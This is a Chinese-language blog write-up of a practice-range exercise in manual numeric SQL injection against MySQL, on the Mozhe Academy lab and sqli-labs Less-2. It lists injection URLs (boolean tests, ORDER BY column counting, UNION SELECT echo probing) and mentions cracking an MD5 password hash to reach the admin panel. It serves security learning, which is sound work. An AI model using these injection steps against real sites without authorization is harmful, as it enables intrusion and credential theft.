WEB安全-SQL手工注入漏洞测试(MySQL数据库-数字型)
前言
目前钻研SQLi注入,这是第三篇,靶场名即为标题,链接如下
SQL手工注入漏洞测试(MySQL数据库)_SQL注入_在线靶场_墨者学院_专注于网络安全人才培养 (mozhe.cn)
正文
看一下要求是手工注入,和之前差不多,依然进入公告进行注入
首先进行猜测是字符型还是数字型,发现无论是单引号还是双引号还是带括号,都不行,尝试数字型逻辑注入,发现可行
http://219.153.49.228:42158/new_list.php?id=1 and 1=1
http://219.153.49.228:42158/new_list.php?id=1 and 1=2
http://219.153.49.228:42158/new_list.php?id=-1 or 1=1
随后判断列数,并显示报错位为
http://219.153.49.228:42158/new_list.php?id=1 order by 4
http://219.153.49.228:42158/new_list.php?id=-1 union select 1,2,3,4
进行md5解密password,得到正确的密码,输入账号密码进入后台获取key
总结
数字型注入还是相对来说比较简单的,以下介绍注入流程
1.先传入参数http://192.168.223.132/sqli-labs/Less-2/?id=1 出现数值
2.修改参数http://192.168.223.132/sqli-labs/Less-2/?id=1 and 1=2 出现报错
3.修改参数http://192.168.223.132/sqli-labs/Less-2/?id=-1 or 1=1 出现最初数值
# id=1 and 1=2是假,传回0,所以无法出现数值,id=-1 or 1=1为真,传回1,和第一次输入一致,可判断为数值型
4.通过order by语句http://192.168.223.132/sqli-labs/Less-2/?id=1 order by 3 判断出有3列,
5.http://192.168.223.132/sqli-labs/Less-2/?id=-1 union select 1,2,3 产生回显,注意这里是-1才能回显,正常的网页回显只有一次。发现回显位为2和3位,接下来就可以通过回显位得出敏感信息